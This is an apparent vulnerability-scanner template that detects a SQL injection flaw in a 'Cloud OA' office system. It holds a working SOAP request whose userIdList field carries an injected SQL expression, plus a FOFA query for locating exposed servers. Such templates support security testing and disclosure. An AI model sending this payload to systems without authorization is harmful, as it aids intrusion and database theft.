54 lines
1.7 KiB
YAML
54 lines
1.7 KiB
YAML
id: cloud-oa-system-sqli
|
|
|
|
info:
|
|
name: Cloud OA System - SQL Injection
|
|
author: SleepingBag945
|
|
severity: high
|
|
description: |
|
|
cloud OA system /OA/PM/svc.asmx page parameters are not properly filtered, resulting in a SQL injection vulnerability, which can be used to obtain sensitive information in the database.
|
|
reference:
|
|
- https://github.com/GREENHAT7/pxplan/blob/e2fc04893ca95e177021ddf61cc2134ecc120a8e/xray_pocs/yaml-poc-eqccd-eqccd_oa-sql_injection-CT-456760.yml#L8
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: body="全程云办公" && body="/OA/WebResource.axd"
|
|
tags: cloud,cloudoa,sqli
|
|
variables:
|
|
num: "999999999"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /OA/PM/svc.asmx HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: text/xml
|
|
|
|
<?xml version="1.0" encoding="utf-8"?>
|
|
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
|
|
<soap:Body>
|
|
<GetUsersInfo xmlns="http://tempuri.org/">
|
|
<userIdList>LOWER(CONVERT(VARCHAR(32),HashBytes('MD5','{{num}}'),2))</userIdList>
|
|
</GetUsersInfo>
|
|
</soap:Body>
|
|
</soap:Envelope>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "System.Data.SqlClient.SqlException"
|
|
- "{{md5(num)}}"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/xml
|
|
|
|
- type: status
|
|
status:
|
|
- 500
|
|
|
|
# digest: 490a0046304402201ef7eee5943cd3f135682a31365b7e6e55689cfc32f27191495dd04665d674c402206add4553dd66405401f96e1d14db0797a45c9bfc1beb88c8fd8674137a9d81d7:922c64590222798bb761d5b6d8e72950
|